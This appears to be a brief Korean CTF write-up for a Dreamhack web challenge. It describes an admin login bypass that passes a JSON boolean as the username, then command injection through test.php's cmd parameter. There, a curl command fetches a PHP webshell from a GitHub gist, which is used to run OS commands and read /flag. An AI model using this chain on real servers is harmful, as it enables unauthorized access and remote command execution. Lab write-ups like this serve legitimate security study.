웹 페이지에 접속! username에 값들을 넣어보았다. 문자열을 넣으면 JSON형식으로 입력하라고 나오고, 숫자는 그냥 들어감. 이것저것 해보다가 웹 소스코드가 있다는 것을 잊었다는 게 생각났다.
index.php에서 admin으로 로그인하는 방법을 유추할 수 있다
사용자의 입력 값을 JSON 형태로 파싱하기 때문에 boolean 타입을 값으로 설정할 수 있다고 한다.
JSON 형태로 username을 넣어준다.
test.php 에서 cmd 파라미터에 웹쉘을 업로드한다.
(curl "https://gist.githubusercontent.com/joswr1ght/22f40787de19d80d110b37fb79ac3985/raw/50008b4501ccb7f804a61bc2e1a3d1df1cb403c4/easy-simple-php-webshell.php" -o hello.php)
hello.php로 가보면 업로드한 웹쉘이 실행되는 것을 알 수 있다.
OS 명령어를 입력하면 결과가 출력된다.
/flag를 통해 flag를 출력한다.
반응형
'STUDY > Dreamhack' 카테고리의 다른 글
| [Dreamhack] Long Sleep(rev, 2) (0) | 2024.07.10 |
|---|---|
| [WEB] DOM XSS (0) | 2024.07.09 |
| [rev] Summer Fan (level2) (0) | 2024.06.15 |
| [web] Dream Gallery (level2) (1) | 2024.06.14 |
| [rev] ez_rev (0) | 2024.04.22 |
